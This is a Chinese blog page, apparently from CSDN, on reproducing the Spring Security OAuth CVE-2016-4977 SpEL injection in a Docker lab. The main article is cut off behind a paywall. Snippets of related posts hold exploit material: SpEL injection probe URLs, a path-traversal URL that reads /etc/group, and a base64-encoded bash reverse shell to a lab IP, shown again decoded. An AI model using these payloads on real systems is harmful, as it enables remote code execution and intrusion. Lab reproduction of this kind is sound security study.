用Docker复现SpringBoot CVE-2016-4977

最新推荐文章于 2025-02-19 12:13:03 发布
最新推荐文章于 2025-02-19 12:13:03 发布
阅读量683 收藏
点赞数 6
分类专栏: 漏洞复现 springboot docker复现springboot 文章标签: docker spring boot java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69555575/article/details/126471314
版权
本文详细介绍了如何在Docker环境中复现Spring Boot Actuator的CVE-2016-4977漏洞,该漏洞可能导致远程命令执行(RCE)。文章首先介绍了Spring Boot Actuator的基本概念,然后通过启动Docker容器并进入Portainer.io后台来演示漏洞利用的步骤,包括登陆、构造payload、测试漏洞以及反弹shell等过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。

基本上就是参考这篇文章的做的复现:

Spring Boot Actuator简介

Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基于HTTP的Actuator端点,因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。

一、docker

1.启动docker

**sudo docker-compose up -d**

2.进到portorner.io后台查看

**启动成功,192.168.75.131/8081**(这里我修改了端口)

二、CVE-2016-4977

原理:

Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。

1.登陆

2.访问url(账号密码是admin&#x

最低0.47元/天 解锁文章
复现CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞
记录并分享学习安全的知识点..
01-15 978
一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 二、漏洞复现 发现页面如下: poc如下: http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme
Spring Security OAuth2 远程命令执行漏洞复现(CVE-2016-4977
来到了学渣的博客
11-09 1987
访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要命令执行需要把执行结果带外才行,java的命令执行漏洞基本需要编码 http://www.jackson-t.ca/runti
CVE-2016-4977(RCE漏洞)
最新发布
datong_dasima的博客
02-19 418
其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjE0MS82OSAwPiYx是进行了base64编码,解码后就是经典反弹shell命令:bash -i >& /dev/tcp/192.168.11.141/4444 0>&1。2.用棱角社区制作反弹shell,ip和端口都是kali的:192.168.11.141:69。显示了4*4的结果,说明可以执行我们自己的代码,那我们想获取对方shell。将其拼接到url里,注意url里面不要有换行符。然后,执行poc.py。
spring漏洞复现CVE-2016-4977+CVE-2017-8046+CVE-2017-4971+CVE-2018-1270+CVE-2018-1273远程命令执行漏洞
serendipity1130的博客
09-01 684
1.CVE-2016-4977 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 1.访问网址: http://192.168.225.139:8080/oauth/authorize?response_type=${233*233}&client
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 5724
cve-2016-4977(spring-security-oauth) RCE漏洞复现
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1823
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1652
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1068
vulhub复现cve-2021-44228 log4j漏洞
springboot 任意文件下载漏洞 CVE-2021-21234
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-02 7041
文章目录复现修复 复现 项目地址:https://github.com/cristianeph/vulnerability-actuator-log-viewer 下载后使用IDEA打开工程,该漏洞是由spring-boot-actuator-logview 0.2.13之前的版本导致的。 运行项目,打开网址 poc如下: http://localhost:8887/manage/log/view?filename=/etc/group&base=../../../../../../../../
log4j复现CVE-2017-5645
m_de_g的博客
07-14 1379
由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。可以看得到已成功执行。反弹shell也能回来。
Spring Security OAuth2 远程命令执行漏洞 CVE-2016-4977 漏洞复现
ADummy的博客
03-02 334
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1362
复现SpringCVE-2016-4977),并且在IDEA中实现动态调试
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977
qq_54713392的博客
05-08 845
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977
黑白的博客
12-20 2131
声明 好好学习,天天向上 漏洞描述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 影响范围 2.0.0-2.0.9 1.0.0-1.0.5 复现过程 这里使用2.0.8版本 使用vulhub cd /app/vulhub-master/spring/CVE-201
springboot 修复 Spring Framework 特定条件下目录遍历漏洞(CVE-2024-38816)
记录点滴
10-14 8176
springboot2.x升级到3.x实战经验总结安全版本6.0.24 和 6.1.13 是springboot3.x使用的版本,springboot3.x的用户只需要将springboot升级到最新版本即可,官方已发布最新版本,如下图所示,springboot3.2以下版本已不再提供更新维护。祝大家升级顺利!
vulhub spring 远程命令执行漏洞(CVE-2016-4977
shw_yzh的博客
09-08 736
spring 远程命令执行漏洞(CVE-2016-4977
CVE-2016-4977 Spring security OAuth2 远程命令执行
flighting019的博客
10-26 121
由于是从幕布导出来的,格式有点乱,大家见谅。至于关闭容器,退出就不多说了。该poc.py的代码如下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值